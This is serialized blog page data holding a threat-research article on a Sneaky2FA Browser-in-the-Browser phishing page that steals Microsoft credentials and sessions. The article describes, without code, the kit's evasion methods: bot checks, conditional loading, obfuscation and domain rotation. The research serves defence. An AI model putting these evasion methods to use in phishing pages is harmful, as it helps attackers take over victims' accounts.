",{"items":34744},[34745,35265,35826],{"__typename":2059,"sys":34746,"content":34747,"title":29375,"synopsis":29376,"hashTags":59,"publishedDate":28784,"slug":29377,"tagsCollection":35255,"authorsCollection":35261},{"id":28798},{"json":34748},{"data":34749,"content":34750,"nodeType":856},{},[34751,34757,34763,34769,34774,34780,34783,34790,34796,34802,34808,34813,34819,34824,34830,34835,34841,34846,34872,34878,34883,34889,34894,34900,34905,34911,34950,34953,34960,34966,34972,34978,34983,34986,34993,34999,35015,35020,35025,35030,35036,35041,35046,35062,35065,35072,35088,35093,35099,35115,35122,35128,35134,35140,35156,35163,35169,35174,35177,35184,35190,35196,35199,35206,35212,35218,35244,35249],{"data":34752,"content":34753,"nodeType":860},{},[34754],{"data":34755,"marks":34756,"value":28809,"nodeType":864},{},[],{"data":34758,"content":34759,"nodeType":860},{},[34760],{"data":34761,"marks":34762,"value":28816,"nodeType":864},{},[],{"data":34764,"content":34765,"nodeType":860},{},[34766],{"data":34767,"marks":34768,"value":28823,"nodeType":864},{},[],{"data":34770,"content":34773,"nodeType":996},{"target":34771},{"sys":34772},{"id":28828,"type":1001,"linkType":1002},[],{"data":34775,"content":34776,"nodeType":860},{},[34777],{"data":34778,"marks":34779,"value":28836,"nodeType":864},{},[],{"data":34781,"content":34782,"nodeType":1005},{},[],{"data":34784,"content":34785,"nodeType":1009},{},[34786],{"data":34787,"marks":34788,"value":28847,"nodeType":864},{},[34789],{"type":899},{"data":34791,"content":34792,"nodeType":860},{},[34793],{"data":34794,"marks":34795,"value":28854,"nodeType":864},{},[],{"data":34797,"content":34798,"nodeType":860},{},[34799],{"data":34800,"marks":34801,"value":28861,"nodeType":864},{},[],{"data":34803,"content":34804,"nodeType":860},{},[34805],{"data":34806,"marks":34807,"value":28868,"nodeType":864},{},[],{"data":34809,"content":34812,"nodeType":996},{"target":34810},{"sys":34811},{"id":28873,"type":1001,"linkType":1002},[],{"data":34814,"content":34815,"nodeType":860},{},[34816],{"data":34817,"marks":34818,"value":28881,"nodeType":864},{},[],{"data":34820,"content":34823,"nodeType":996},{"target":34821},{"sys":34822},{"id":28886,"type":1001,"linkType":1002},[],{"data":34825,"content":34826,"nodeType":860},{},[34827],{"data":34828,"marks":34829,"value":28894,"nodeType":864},{},[],{"data":34831,"content":34834,"nodeType":996},{"target":34832},{"sys":34833},{"id":28899,"type":1001,"linkType":1002},[],{"data":34836,"content":34837,"nodeType":860},{},[34838],{"data":34839,"marks":34840,"value":28907,"nodeType":864},{},[],{"data":34842,"content":34845,"nodeType":996},{"target":34843},{"sys":34844},{"id":28912,"type":1001,"linkType":1002},[],{"data":34847,"content":34848,"nodeType":860},{},[34849,34852,34859,34862,34869],{"data":34850,"marks":34851,"value":28920,"nodeType":864},{},[],{"data":34853,"content":34854,"nodeType":883},{"uri":26883},[34855],{"data":34856,"marks":34857,"value":28928,"nodeType":864},{},[34858],{"type":1455},{"data":34860,"marks":34861,"value":28932,"nodeType":864},{},[],{"data":34863,"content":34864,"nodeType":883},{"uri":7124},[34865],{"data":34866,"marks":34867,"value":7129,"nodeType":864},{},[34868],{"type":1455},{"data":34870,"marks":34871,"value":28943,"nodeType":864},{},[],{"data":34873,"content":34874,"nodeType":860},{},[34875],{"data":34876,"marks":34877,"value":28950,"nodeType":864},{},[],{"data":34879,"content":34882,"nodeType":996},{"target":34880},{"sys":34881},{"id":28955,"type":1001,"linkType":1002},[],{"data":34884,"content":34885,"nodeType":860},{},[34886],{"data":34887,"marks":34888,"value":28963,"nodeType":864},{},[],{"data":34890,"content":34893,"nodeType":996},{"target":34891},{"sys":34892},{"id":28968,"type":1001,"linkType":1002},[],{"data":34895,"content":34896,"nodeType":860},{},[34897],{"data":34898,"marks":34899,"value":28976,"nodeType":864},{},[],{"data":34901,"content":34904,"nodeType":996},{"target":34902},{"sys":34903},{"id":28981,"type":1001,"linkType":1002},[],{"data":34906,"content":34907,"nodeType":860},{},[34908],{"data":34909,"marks":34910,"value":28989,"nodeType":864},{},[],{"data":34912,"content":34913,"nodeType":941},{},[34914,34923,34932,34941],{"data":34915,"content":34916,"nodeType":945},{},[34917],{"data":34918,"content":34919,"nodeType":860},{},[34920],{"data":34921,"marks":34922,"value":29002,"nodeType":864},{},[],{"data":34924,"content":34925,"nodeType":945},{},[34926],{"data":34927,"content":34928,"nodeType":860},{},[34929],{"data":34930,"marks":34931,"value":29012,"nodeType":864},{},[],{"data":34933,"content":34934,"nodeType":945},{},[34935],{"data":34936,"content":34937,"nodeType":860},{},[34938],{"data":34939,"marks":34940,"value":29022,"nodeType":864},{},[],{"data":34942,"content":34943,"nodeType":945},{},[34944],{"data":34945,"content":34946,"nodeType":860},{},[34947],{"data":34948,"marks":34949,"value":29032,"nodeType":864},{},[],{"data":34951,"content":34952,"nodeType":1005},{},[],{"data":34954,"content":34955,"nodeType":1009},{},[34956],{"data":34957,"marks":34958,"value":29043,"nodeType":864},{},[34959],{"type":899},{"data":34961,"content":34962,"nodeType":860},{},[34963],{"data":34964,"marks":34965,"value":29050,"nodeType":864},{},[],{"data":34967,"content":34968,"nodeType":860},{},[34969],{"data":34970,"marks":34971,"value":29057,"nodeType":864},{},[],{"data":34973,"content":34974,"nodeType":860},{},[34975],{"data":34976,"marks":34977,"value":29064,"nodeType":864},{},[],{"data":34979,"content":34982,"nodeType":996},{"target":34980},{"sys":34981},{"id":29069,"type":1001,"linkType":1002},[],{"data":34984,"content":34985,"nodeType":1005},{},[],{"data":34987,"content":34988,"nodeType":1009},{},[34989],{"data":34990,"marks":34991,"value":29081,"nodeType":864},{},[34992],{"type":899},{"data":34994,"content":34995,"nodeType":860},{},[34996],{"data":34997,"marks":34998,"value":29088,"nodeType":864},{},[],{"data":35000,"content":35001,"nodeType":860},{},[35002,35005,35012],{"data":35003,"marks":35004,"value":29095,"nodeType":864},{},[],{"data":35006,"content":35007,"nodeType":883},{"uri":29098},[35008],{"data":35009,"marks":35010,"value":29104,"nodeType":864},{},[35011],{"type":1455},{"data":35013,"marks":35014,"value":29108,"nodeType":864},{},[],{"data":35016,"content":35019,"nodeType":996},{"target":35017},{"sys":35018},{"id":29113,"type":1001,"linkType":1002},[],{"data":35021,"content":35024,"nodeType":996},{"target":35022},{"sys":35023},{"id":29119,"type":1001,"linkType":1002},[],{"data":35026,"content":35029,"nodeType":996},{"target":35027},{"sys":35028},{"id":29125,"type":1001,"linkType":1002},[],{"data":35031,"content":35032,"nodeType":860},{},[35033],{"data":35034,"marks":35035,"value":29133,"nodeType":864},{},[],{"data":35037,"content":35040,"nodeType":996},{"target":35038},{"sys":35039},{"id":29138,"type":1001,"linkType":1002},[],{"data":35042,"content":35045,"nodeType":996},{"target":35043},{"sys":35044},{"id":29144,"type":1001,"linkType":1002},[],{"data":35047,"content":35048,"nodeType":860},{},[35049,35052,35059],{"data":35050,"marks":35051,"value":29152,"nodeType":864},{},[],{"data":35053,"content":35054,"nodeType":883},{"uri":29155},[35055],{"data":35056,"marks":35057,"value":29161,"nodeType":864},{},[35058],{"type":1455},{"data":35060,"marks":35061,"value":29165,"nodeType":864},{},[],{"data":35063,"content":35064,"nodeType":1005},{},[],{"data":35066,"content":35067,"nodeType":1009},{},[35068],{"data":35069,"marks":35070,"value":29176,"nodeType":864},{},[35071],{"type":899},{"data":35073,"content":35074,"nodeType":860},{},[35075,35078,35085],{"data":35076,"marks":35077,"value":29183,"nodeType":864},{},[],{"data":35079,"content":35080,"nodeType":883},{"uri":29186},[35081],{"data":35082,"marks":35083,"value":13810,"nodeType":864},{},[35084],{"type":1455},{"data":35086,"marks":35087,"value":29195,"nodeType":864},{},[],{"data":35089,"content":35092,"nodeType":996},{"target":35090},{"sys":35091},{"id":29200,"type":1001,"linkType":1002},[],{"data":35094,"content":35095,"nodeType":860},{},[35096],{"data":35097,"marks":35098,"value":29208,"nodeType":864},{},[],{"data":35100,"content":35101,"nodeType":860},{},[35102,35105,35112],{"data":35103,"marks":35104,"value":28577,"nodeType":864},{},[],{"data":35106,"content":35107,"nodeType":883},{"uri":13019},[35108],{"data":35109,"marks":35110,"value":315,"nodeType":864},{},[35111],{"type":1455},{"data":35113,"marks":35114,"value":28588,"nodeType":864},{},[],{"data":35116,"content":35117,"nodeType":1312},{},[35118],{"data":35119,"marks":35120,"value":29232,"nodeType":864},{},[35121],{"type":899},{"data":35123,"content":35124,"nodeType":860},{},[35125],{"data":35126,"marks":35127,"value":29239,"nodeType":864},{},[],{"data":35129,"content":35130,"nodeType":860},{},[35131],{"data":35132,"marks":35133,"value":29246,"nodeType":864},{},[],{"data":35135,"content":35136,"nodeType":860},{},[35137],{"data":35138,"marks":35139,"value":28556,"nodeType":864},{},[],{"data":35141,"content":35142,"nodeType":860},{},[35143,35146,35153],{"data":35144,"marks":35145,"value":29259,"nodeType":864},{},[],{"data":35147,"content":35148,"nodeType":883},{"uri":6237},[35149],{"data":35150,"marks":35151,"value":6242,"nodeType":864},{},[35152],{"type":1455},{"data":35154,"marks":35155,"value":29270,"nodeType":864},{},[],{"data":35157,"content":35158,"nodeType":1312},{},[35159],{"data":35160,"marks":35161,"value":29278,"nodeType":864},{},[35162],{"type":899},{"data":35164,"content":35165,"nodeType":860},{},[35166],{"data":35167,"marks":35168,"value":29285,"nodeType":864},{},[],{"data":35170,"content":35173,"nodeType":996},{"target":35171},{"sys":35172},{"id":29290,"type":1001,"linkType":1002},[],{"data":35175,"content":35176,"nodeType":1005},{},[],{"data":35178,"content":35179,"nodeType":1009},{},[35180],{"data":35181,"marks":35182,"value":5571,"nodeType":864},{},[35183],{"type":899},{"data":35185,"content":35186,"nodeType":860},{},[35187],{"data":35188,"marks":35189,"value":29308,"nodeType":864},{},[],{"data":35191,"content":35192,"nodeType":860},{},[35193],{"data":35194,"marks":35195,"value":28714,"nodeType":864},{},[],{"data":35197,"content":35198,"nodeType":1005},{},[],{"data":35200,"content":35201,"nodeType":1009},{},[35202],{"data":35203,"marks":35204,"value":3578,"nodeType":864},{},[35205],{"type":899},{"data":35207,"content":35208,"nodeType":860},{},[35209],{"data":35210,"marks":35211,"value":29331,"nodeType":864},{},[],{"data":35213,"content":35214,"nodeType":860},{},[35215],{"data":35216,"marks":35217,"value":19737,"nodeType":864},{},[],{"data":35219,"content":35220,"nodeType":860},{},[35221,35224,35231,35234,35241],{"data":35222,"marks":35223,"value":16314,"nodeType":864},{},[],{"data":35225,"content":35226,"nodeType":883},{"uri":10269},[35227],{"data":35228,"marks":35229,"value":10275,"nodeType":864},{},[35230],{"type":1455},{"data":35232,"marks":35233,"value":19754,"nodeType":864},{},[],{"data":35235,"content":35236,"nodeType":883},{"uri":1700},[35237],{"data":35238,"marks":35239,"value":10299,"nodeType":864},{},[35240],{"type":1455},{"data":35242,"marks":35243,"value":2924,"nodeType":864},{},[],{"data":35245,"content":35248,"nodeType":996},{"target":35246},{"sys":35247},{"id":27224,"type":1001,"linkType":1002},[],{"data":35250,"content":35251,"nodeType":860},{},[35252],{"data":35253,"marks":35254,"value":21,"nodeType":864},{},[],{"items":35256},[35257,35259],{"sys":35258,"name":6593},{"id":6592},{"sys":35260,"name":342},{"id":6596},{"items":35262},[35263],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":35264},{"url":4955},{"__typename":2059,"sys":35266,"content":35268,"title":35812,"synopsis":35813,"hashTags":59,"publishedDate":35814,"slug":35815,"tagsCollection":35816,"authorsCollection":35822},{"id":35267},"6QLonRmBzbj9h88Y7jD0LU",{"json":35269},{"data":35270,"content":35271,"nodeType":856},{},[35272,35279,35285,35314,35321,35328,35335,35338,35346,35366,35373,35379,35386,35392,35399,35405,35412,35418,35425,35431,35438,35445,35451,35454,35462,35482,35489,35496,35502,35520,35528,35548,35556,35574,35581,35587,35619,35627,35660,35668,35688,35693,35696,35704,35724,35730,35733,35740,35747,35754,35757,35764,35770,35777,35801,35806],{"data":35273,"content":35274,"nodeType":860},{},[35275],{"data":35276,"marks":35277,"value":35278,"nodeType":864},{},[],"PhaaS kits make up the vast majority of phishing sites intercepted by Push and dominate the phishing landscape, with kits like Tycoon, NakedPages, Flowerstorm, Salty2FA, and various Evilginx variations proving very popular among attackers targeting Push customers.",{"data":35280,"content":35281,"nodeType":860},{},[35282],{"data":35283,"marks":35284,"value":26797,"nodeType":864},{},[],{"data":35286,"content":35287,"nodeType":860},{},[35288,35292,35300,35303,35310],{"data":35289,"marks":35290,"value":35291,"nodeType":864},{},[],"This competitive environment has fuelled attacker innovation, resulting in an environment in which MFA-bypass is table stakes, phishing-resistant authentication is being circumvented through ",{"data":35293,"content":35295,"nodeType":883},{"uri":35294},"https://pushsecurity.com/blog/mfa-downgrade-attacks/",[35296],{"data":35297,"marks":35298,"value":26813,"nodeType":864},{},[35299],{"type":1455},{"data":35301,"marks":35302,"value":2232,"nodeType":864},{},[],{"data":35304,"content":35305,"nodeType":883},{"uri":7124},[35306],{"data":35307,"marks":35308,"value":13810,"nodeType":864},{},[35309],{"type":1455},{"data":35311,"marks":35312,"value":35313,"nodeType":864},{},[]," are being used to circumvent security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic.",{"data":35315,"content":35316,"nodeType":860},{},[35317],{"data":35318,"marks":35319,"value":35320,"nodeType":864},{},[],"Recently, we’ve noticed an increase in detections relating to Sneaky2FA, which operates through a fully-featured bot on Telegram. Customers reportedly receive access to a licensed, obfuscated version of the source code and deploy it independently.",{"data":35322,"content":35323,"nodeType":860},{},[35324],{"data":35325,"marks":35326,"value":35327,"nodeType":864},{},[],"This makes Sneaky2FA something that can be reliably profiled and tracked due to these codebase similarities — which is what we’re actively doing at Push. ",{"data":35329,"content":35330,"nodeType":860},{},[35331],{"data":35332,"marks":35333,"value":35334,"nodeType":864},{},[],"Why is this relevant? Well, the latest Sneaky2FA phish we identified was pretty interesting. ",{"data":35336,"content":35337,"nodeType":1005},{},[],{"data":35339,"content":35340,"nodeType":1009},{},[35341],{"data":35342,"marks":35343,"value":35345,"nodeType":864},{},[35344],{"type":899},"Sneaky2FA adds BITB to its phishing toolkit",{"data":35347,"content":35348,"nodeType":860},{},[35349,35353,35362],{"data":35350,"marks":35351,"value":35352,"nodeType":864},{},[],"We recently detected a Sneaky2FA server that is a bit different from the typical reverse-proxy ",{"data":35354,"content":35356,"nodeType":883},{"uri":35355},"https://pushsecurity.com/blog/phishing-2-0-how-phishing-toolkits-are-evolving-with-aitm/",[35357],{"data":35358,"marks":35359,"value":35361,"nodeType":864},{},[35360],{"type":1455},"Attacker-in-the-Middle",{"data":35363,"marks":35364,"value":35365,"nodeType":864},{},[]," site, featuring an embedded browser window that contained the actual phishing page. ",{"data":35367,"content":35368,"nodeType":860},{},[35369],{"data":35370,"marks":35371,"value":35372,"nodeType":864},{},[],"You can see how the page loaded below in the video below.",{"data":35374,"content":35378,"nodeType":996},{"target":35375},{"sys":35376},{"id":35377,"type":1001,"linkType":1002},"6L6Ban2xptI1uNA8OPJQzq",[],{"data":35380,"content":35381,"nodeType":860},{},[35382],{"data":35383,"marks":35384,"value":35385,"nodeType":864},{},[],"When the URL previewdoc[.]us is first accessed, a Cloudflare Turnstile check must be completed before the page loads. ",{"data":35387,"content":35391,"nodeType":996},{"target":35388},{"sys":35389},{"id":35390,"type":1001,"linkType":1002},"QscI1SZ6dOpgMkrJPtqLD",[],{"data":35393,"content":35394,"nodeType":860},{},[35395],{"data":35396,"marks":35397,"value":35398,"nodeType":864},{},[],"The page then redirects to a subdomain of previewdoc[.]us, which prompts the user to “Sign in with Microsoft” in order to view a document, styled to look like Adobe Acrobat Reader. ",{"data":35400,"content":35404,"nodeType":996},{"target":35401},{"sys":35402},{"id":35403,"type":1001,"linkType":1002},"7pkfAQquHrA6aUnCtj74iu",[],{"data":35406,"content":35407,"nodeType":860},{},[35408],{"data":35409,"marks":35410,"value":35411,"nodeType":864},{},[],"Upon clicking ‘Sign in with Microsoft” a reverse-proxy phishing page resembling a Microsoft login form is loaded in an embedded browser, with a custom background image designed to resemble a document library. ",{"data":35413,"content":35417,"nodeType":996},{"target":35414},{"sys":35415},{"id":35416,"type":1001,"linkType":1002},"782tw14AqgJ9mqneVaOdHc",[],{"data":35419,"content":35420,"nodeType":860},{},[35421],{"data":35422,"marks":35423,"value":35424,"nodeType":864},{},[],"Interestingly, the pop-up window adjusts to the visitor’s OS and browser — you can see some different examples below.",{"data":35426,"content":35430,"nodeType":996},{"target":35427},{"sys":35428},{"id":35429,"type":1001,"linkType":1002},"6lN9agEyeQ63LDHM1kaSqX",[],{"data":35432,"content":35433,"nodeType":860},{},[35434],{"data":35435,"marks":35436,"value":35437,"nodeType":864},{},[],"Completing authentication will result in the user’s Microsoft credentials and active session being stolen by the attacker, facilitating account takeover. ",{"data":35439,"content":35440,"nodeType":860},{},[35441],{"data":35442,"marks":35443,"value":35444,"nodeType":864},{},[],"You can see the sequence of pages loaded and Push detection events in the timeline below.",{"data":35446,"content":35450,"nodeType":996},{"target":35447},{"sys":35448},{"id":35449,"type":1001,"linkType":1002},"1oPpha39PMiJGUaZSptx1f",[],{"data":35452,"content":35453,"nodeType":1005},{},[],{"data":35455,"content":35456,"nodeType":1009},{},[35457],{"data":35458,"marks":35459,"value":35461,"nodeType":864},{},[35460],{"type":899},"Why Browser-in-the-Browser?",{"data":35463,"content":35464,"nodeType":860},{},[35465,35469,35478],{"data":35466,"marks":35467,"value":35468,"nodeType":864},{},[],"BITB was first coined as a technique in 2022 by ",{"data":35470,"content":35472,"nodeType":883},{"uri":35471},"https://mrd0x.com/browser-in-the-browser-phishing-attack/",[35473],{"data":35474,"marks":35475,"value":35477,"nodeType":864},{},[35476],{"type":1455},"mr.d0x",{"data":35479,"marks":35480,"value":35481,"nodeType":864},{},[],", but standard AITM phishing pages are far more frequently encountered in the wild, particularly when it comes to enterprise business targets.",{"data":35483,"content":35484,"nodeType":860},{},[35485],{"data":35486,"marks":35487,"value":35488,"nodeType":864},{},[],"BITB is principally designed to mask suspicious phishing URLs by simulating a pretty normal function of in-browser authentication — a pop-up login form. BITB phishing pages replicate the design of a pop-up window with an iframe pointing to a malicious server. ",{"data":35490,"content":35491,"nodeType":860},{},[35492],{"data":35493,"marks":35494,"value":35495,"nodeType":864},{},[],"The pop-up browser window shows a legitimate Microsoft login URL — this is in fact a fake URL that is designed to fool the user. ",{"data":35497,"content":35501,"nodeType":996},{"target":35498},{"sys":35499},{"id":35500,"type":1001,"linkType":1002},"7kI5PHTr9XYQJ0xVJUnUDu",[],{"data":35503,"content":35504,"nodeType":860},{},[35505,35509,35516],{"data":35506,"marks":35507,"value":35508,"nodeType":864},{},[],"This BITB example shares many of the advantages of typical reverse-proxy based phishing pages, as well as the ",{"data":35510,"content":35511,"nodeType":883},{"uri":7124},[35512],{"data":35513,"marks":35514,"value":13810,"nodeType":864},{},[35515],{"type":1455},{"data":35517,"marks":35518,"value":35519,"nodeType":864},{},[]," that are commonly used by attackers (and baked into PhaaS kits off-the-shelf). This includes:",{"data":35521,"content":35522,"nodeType":1312},{},[35523],{"data":35524,"marks":35525,"value":35527,"nodeType":864},{},[35526],{"type":899},"Bot protection to defeat web scraping tools",{"data":35529,"content":35530,"nodeType":860},{},[35531,35535,35544],{"data":35532,"marks":35533,"value":35534,"nodeType":864},{},[],"Attackers are using common ",{"data":35536,"content":35538,"nodeType":883},{"uri":35537},"https://phishing-techniques.pushsecurity.com/techniques/bot-protection/",[35539],{"data":35540,"marks":35541,"value":35543,"nodeType":864},{},[35542],{"type":1455},"bot protection",{"data":35545,"marks":35546,"value":35547,"nodeType":864},{},[]," technologies like CAPTCHA and Cloudflare Turnstile to prevent security bots from accessing their web pages to be able to analyse them (and therefore block pages from being automatically flagged). This requires anyone visiting the page to pass a bot check/challenge before the page can be loaded, meaning the full page cannot be analysed by automated tools. ",{"data":35549,"content":35550,"nodeType":1312},{},[35551],{"data":35552,"marks":35553,"value":35555,"nodeType":864},{},[35554],{"type":899},"Stop unwanted visitors with conditional loading",{"data":35557,"content":35558,"nodeType":860},{},[35559,35562,35570],{"data":35560,"marks":35561,"value":21,"nodeType":864},{},[],{"data":35563,"content":35564,"nodeType":883},{"uri":26883},[35565],{"data":35566,"marks":35567,"value":35569,"nodeType":864},{},[35568],{"type":1455},"Conditional loading",{"data":35571,"marks":35572,"value":35573,"nodeType":864},{},[]," techniques are used to prevent unwanted visitors from accessing the phishing page — reducing the chance that it is detected and flagged and extending the longevity of the phish. This often includes known security vendor IPs, VPN/proxy services, but is often used to target specific organizations (or even specific users within an organization). ",{"data":35575,"content":35576,"nodeType":860},{},[35577],{"data":35578,"marks":35579,"value":35580,"nodeType":864},{},[],"In this case, where the correct parameters are not supplied or the phishing site detects an unwanted variable, it will redirect to a benign wikibooks page. ",{"data":35582,"content":35586,"nodeType":996},{"target":35583},{"sys":35584},{"id":35585,"type":1001,"linkType":1002},"fN2XugiDIef8haTDapViT",[],{"data":35588,"content":35589,"nodeType":860},{},[35590,35594,35602,35606,35615],{"data":35591,"marks":35592,"value":35593,"nodeType":864},{},[],"Sneaky2FA has also been commonly observed using ",{"data":35595,"content":35596,"nodeType":883},{"uri":29155},[35597],{"data":35598,"marks":35599,"value":35601,"nodeType":864},{},[35600],{"type":1455},"anti-analysis",{"data":35603,"marks":35604,"value":35605,"nodeType":864},{},[]," techniques to detect or ",{"data":35607,"content":35609,"nodeType":883},{"uri":35608},"https://blog.sekoia.io/sneaky-2fa-exposing-a-new-aitm-phishing-as-a-service/#:~:text=Sneaky%202FA%20pages%20use%20anti,we%20identified%20as%20Sneaky%202FA",[35610],{"data":35611,"marks":35612,"value":35614,"nodeType":864},{},[35613],{"type":1455},"disable browser developer tools",{"data":35616,"marks":35617,"value":35618,"nodeType":864},{},[]," to block attempts to analyse the page for malicious content. ",{"data":35620,"content":35621,"nodeType":1312},{},[35622],{"data":35623,"marks":35624,"value":35626,"nodeType":864},{},[35625],{"type":899},"Page and code obfuscation",{"data":35628,"content":35629,"nodeType":860},{},[35630,35634,35643,35647,35656],{"data":35631,"marks":35632,"value":35633,"nodeType":864},{},[],"The HTML and JavaScript of Sneaky2FA pages are ",{"data":35635,"content":35637,"nodeType":883},{"uri":35636},"https://phishing-techniques.pushsecurity.com/techniques/page-obfuscation/",[35638],{"data":35639,"marks":35640,"value":35642,"nodeType":864},{},[35641],{"type":1455},"heavily obfuscated",{"data":35644,"marks":35645,"value":35646,"nodeType":864},{},[]," to evade static detection and pattern-matching, ",{"data":35648,"content":35650,"nodeType":883},{"uri":35649},"https://blog.sekoia.io/sneaky-2fa-exposing-a-new-aitm-phishing-as-a-service/#:~:text=,%E2%80%9CNo%20account%3F%E2%80%9D%20and%20%E2%80%9CSign%20in%E2%80%9D",[35651],{"data":35652,"marks":35653,"value":35655,"nodeType":864},{},[35654],{"type":1455},"such as",{"data":35657,"marks":35658,"value":35659,"nodeType":864},{},[]," breaking up UI text with invisible tags, embedding background and interface elements as encoded images instead of text, and other changes that are invisible to the user, but make it hard for scanning tools to fingerprint the page. ",{"data":35661,"content":35662,"nodeType":1312},{},[35663],{"data":35664,"marks":35665,"value":35667,"nodeType":864},{},[35666],{"type":899},"Domain rotation and URL masking",{"data":35669,"content":35670,"nodeType":860},{},[35671,35675,35684],{"data":35672,"marks":35673,"value":35674,"nodeType":864},{},[],"In addition to masking the phishing site URL presented to the user via the BITB window, Sneaky2FA has been seen using ",{"data":35676,"content":35678,"nodeType":883},{"uri":35677},"https://www.centripetal.ai/threat-research/typhoon-versus-sneaky",[35679],{"data":35680,"marks":35681,"value":35683,"nodeType":864},{},[35682],{"type":1455},"stealthy hosting and domain tactics",{"data":35685,"marks":35686,"value":35687,"nodeType":864},{},[],". Each campaign uses a fresh, long, randomized URL (typically a 150-character path) on a benign-looking domain (often an old or compromised site). These domains are usually short-lived: many are taken down after just a few days or weeks. Analysts have observed that Sneaky2FA domains often lie dormant or serve harmless content until right before an attack, then quickly vanish after use. This “burn-and-replace” approach makes traditional defenses (which rely on domain reputation or pattern-matching) much weaker.",{"data":35689,"content":35692,"nodeType":996},{"target":35690},{"sys":35691},{"id":27224,"type":1001,"linkType":1002},[],{"data":35694,"content":35695,"nodeType":1005},{},[],{"data":35697,"content":35698,"nodeType":1009},{},[35699],{"data":35700,"marks":35701,"value":35703,"nodeType":864},{},[35702],{"type":899},"Are attackers moving to BITB? ",{"data":35705,"content":35706,"nodeType":860},{},[35707,35711,35720],{"data":35708,"marks":35709,"value":35710,"nodeType":864},{},[],"There is evidence that Sneaky2FAs shift to BITB might not be an isolated change. Raccoon0365 is another PhaaS service that has been seen utilizing BITB functionality after ",{"data":35712,"content":35714,"nodeType":883},{"uri":35713},"https://www.cloudflare.com/en-gb/threat-intelligence/research/report/cloudflare-participates-in-global-operation-to-disrupt-raccoono365/",[35715],{"data":35716,"marks":35717,"value":35719,"nodeType":864},{},[35718],{"type":1455},"announcing a “BITB mini-panel”",{"data":35721,"marks":35722,"value":35723,"nodeType":864},{},[]," would be added as part of a service revamp. ",{"data":35725,"content":35729,"nodeType":996},{"target":35726},{"sys":35727},{"id":35728,"type":1001,"linkType":1002},"2sJUR9TVbZMU1v10Tq94Pz",[],{"data":35731,"content":35732,"nodeType":1005},{},[],{"data":35734,"content":35735,"nodeType":1009},{},[35736],{"data":35737,"marks":35738,"value":24968,"nodeType":864},{},[35739],{"type":899},{"data":35741,"content":35742,"nodeType":860},{},[35743],{"data":35744,"marks":35745,"value":35746,"nodeType":864},{},[],"Attackers are continuously innovating their phishing techniques, particularly in the context of an increasingly professionalized PhaaS ecosystem. With identity-based attacks continuing to be the leading cause of breaches, attackers are incentivized to refine and enhance their phishing infrastructure. ",{"data":35748,"content":35749,"nodeType":860},{},[35750],{"data":35751,"marks":35752,"value":35753,"nodeType":864},{},[],"The addition of BITB, with the frequent iteration and improvement of detection evasion techniques, means that traditional security controls such as email gateways, web filters, and signature-based defenses will continue to be reliably bypassed. ",{"data":35755,"content":35756,"nodeType":1005},{},[],{"data":35758,"content":35759,"nodeType":1009},{},[35760],{"data":35761,"marks":35762,"value":17636,"nodeType":864},{},[35763],{"type":899},{"data":35765,"content":35766,"nodeType":860},{},[35767],{"data":35768,"marks":35769,"value":29331,"nodeType":864},{},[],{"data":35771,"content":35772,"nodeType":860},{},[35773],{"data":35774,"marks":35775,"value":35776,"nodeType":864},{},[],"Despite the various detection evasion techniques, and the use of BITB methods, Push still detected this toolkit running on the page, enabling any attack to be detected and blocked before the user could be phished. Because we can inspect the live page, we detect malicious content loaded in the browser in real time. ",{"data":35778,"content":35779,"nodeType":860},{},[35780,35783,35789,35792,35798],{"data":35781,"marks":35782,"value":16314,"nodeType":864},{},[],{"data":35784,"content":35785,"nodeType":883},{"uri":10269},[35786],{"data":35787,"marks":35788,"value":10275,"nodeType":864},{},[],{"data":35790,"marks":35791,"value":19754,"nodeType":864},{},[],{"data":35793,"content":35794,"nodeType":883},{"uri":1700},[35795],{"data":35796,"marks":35797,"value":10299,"nodeType":864},{},[],{"data":35799,"marks":35800,"value":2924,"nodeType":864},{},[],{"data":35802,"content":35805,"nodeType":996},{"target":35803},{"sys":35804},{"id":27224,"type":1001,"linkType":1002},[],{"data":35807,"content":35808,"nodeType":860},{},[35809],{"data":35810,"marks":35811,"value":21,"nodeType":864},{},[],"Analyzing the latest Sneaky2FA Browser-in-the-Browser phishing page","Analyzing a BITB phishing page linked to the Sneaky2FA Phishing-as-a-Service operation. ","2025-11-18T00:00:00.000Z","analyzing-the-latest-sneaky2fa-phishing-page",{"items":35817},[35818,35820],{"sys":35819,"name":6593},{"id":6592},{"sys":35821,"name":342},{"id":6596},{"items":35823},[35824],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":35825},{"url":2740},{"__typename":2059,"sys":35827,"content":35828,"title":23856,"synopsis":23857,"hashTags":59,"publishedDate":23858,"slug":23859,"tagsCollection":36325,"authorsCollection":36331},{"id":23279},{"json":35829},{"data":35830,"content":35831,"nodeType":856},{},[35832,35838,35844,35854,35859,35865,35868,35875,35881,35886,35899,35905,35926,35932,35937,35940,35947,35973,35978,35994,35999,36015,36021,36026,36029,36036,36042,36058,36064,36080,36086,36091,36094,36101,36107,36137,36143,36149,36189,36204,36213,36219,36222,36229,36245,36251,36257,36262,36265,36272,36288,36314,36319],{"data":35833,"content":35834,"nodeType":860},{},[35835],{"data":35836,"marks":35837,"value":23290,"nodeType":864},{},[],{"data":35839,"content":35840,"nodeType":860},{},[35841],{"data":35842,"marks":35843,"value":23297,"nodeType":864},{},[],{"data":35845,"content":35846,"nodeType":860},{},[35847,35850],{"data":35848,"marks":35849,"value":23304,"nodeType":864},{},[],{"data":35851,"marks":35852,"value":23309,"nodeType":864},{},[35853],{"type":899},{"data":35855,"content":35858,"nodeType":996},{"target":35856},{"sys":35857},{"id":23314,"type":1001,"linkType":1002},[],{"data":35860,"content":35861,"nodeType":860},{},[35862],{"data":35863,"marks":35864,"value":23322,"nodeType":864},{},[],{"data":35866,"content":35867,"nodeType":1005},{},[],{"data":35869,"content":35870,"nodeType":1009},{},[35871],{"data":35872,"marks":35873,"value":23333,"nodeType":864},{},[35874],{"type":899},{"data":35876,"content":35877,"nodeType":860},{},[35878],{"data":35879,"marks":35880,"value":23340,"nodeType":864},{},[],{"data":35882,"content":35885,"nodeType":996},{"target":35883},{"sys":35884},{"id":23345,"type":1001,"linkType":1002},[],{"data":35887,"content":35888,"nodeType":860},{},[35889,35892,35896],{"data":35890,"marks":35891,"value":23353,"nodeType":864},{},[],{"data":35893,"marks":35894,"value":23358,"nodeType":864},{},[35895],{"type":899},{"data":35897,"marks":35898,"value":23362,"nodeType":864},{},[],{"data":35900,"content":35901,"nodeType":860},{},[35902],{"data":35903,"marks":35904,"value":23369,"nodeType":864},{},[],{"data":35906,